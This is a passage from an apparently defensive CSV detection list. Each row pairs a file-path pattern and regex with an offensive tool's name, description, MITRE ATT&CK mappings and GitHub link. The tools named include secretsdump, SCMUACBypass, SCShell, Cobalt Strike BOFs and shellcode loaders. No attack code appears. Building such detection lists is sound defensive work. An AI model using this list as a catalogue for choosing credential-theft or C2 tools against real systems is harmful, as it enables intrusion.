- TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/portscan*",".{0,1000}\/scanner\/portscan.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scanner/winrm*",".{0,1000}\/scanner\/winrm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/scannerPort.go*",".{0,1000}\/scannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*/scan-network.py*",".{0,1000}\/scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Scans/servers_all_smb*.txt*",".{0,1000}\/Scans\/servers_all_smb.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ScareCrow -I *",".{0,1000}\/ScareCrow\s\-I\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/sccmhunter*",".{0,1000}\/sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*/schtasksenum/*.*",".{0,1000}\/schtasksenum\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/sc-loader.exe*",".{0,1000}\/sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/scmuacbypass.cpp*",".{0,1000}\/scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/scmuacbypass.exe*",".{0,1000}\/scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass.git*",".{0,1000}\/SCMUACBypass\.git.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass/*",".{0,1000}\/SCMUACBypass\/.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCOMDecrypt.git*",".{0,1000}\/SCOMDecrypt\.git.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*/ScreenshotInject*",".{0,1000}\/ScreenshotInject.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/script/reuse.py*",".{0,1000}\/script\/reuse\.py.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/scripts/xor.py*",".{0,1000}\/scripts\/xor\.py.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*/ScriptSentry.git*",".{0,1000}\/ScriptSentry\.git.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.ps1*",".{0,1000}\/ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.psd1*",".{0,1000}\/ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScriptSentry.psm1*",".{0,1000}\/ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*/ScRunHex.py*",".{0,1000}\/ScRunHex\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/scshell*",".{0,1000}\/scshell.{0,1000}","offensive_tool_keyword","scshell","SCShell is a fileless Lateral Movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*/scshell.py*",".{0,1000}\/scshell\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/scuffy.py*",".{0,1000}\/scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/sdb-explorer.exe*",".{0,1000}\/sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*/searchsploit*",".{0,1000}\/searchsploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/SeatBelt.exe*",".{0,1000}\/SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Seatbelt.git*",".{0,1000}\/Seatbelt\.git.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*/Seatbelt.txt*",".{0,1000}\/Seatbelt\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Seatbelt/Commands*",".{0,1000}\/Seatbelt\/Commands.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*/seatbelt_json.py*",".{0,1000}\/seatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/SeBackupPrivilege.md*",".{0,1000}\/SeBackupPrivilege\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/secinject.c*",".{0,1000}\/secinject\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*/SecretFinder.git*",".{0,1000}\/SecretFinder\.git.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/secretsdump_*.txt*",".{0,1000}\/secretsdump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/SecScanC2.git*",".{0,1000}\/SecScanC2\.git.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/sec-tools/litefuzz*",".{0,1000}\/sec\-tools\/litefuzz.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*/SeeYouCM-Thief*",".{0,1000}\/SeeYouCM\-Thief.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/self_delete.cna*",".{0,1000}\/self_delete\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*/self_deletion.exe*",".{0,1000}\/self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/SeManageVolumeExploit.git*",".{0,1000}\/SeManageVolumeExploit\.git.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*/SeriousSam.sln*",".{0,1000}\/SeriousSam\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/server/c2/*",".{0,1000}\/server\/c2\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/server/common/stagers.py*",".{0,1000}\/server\/common\/stagers\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - 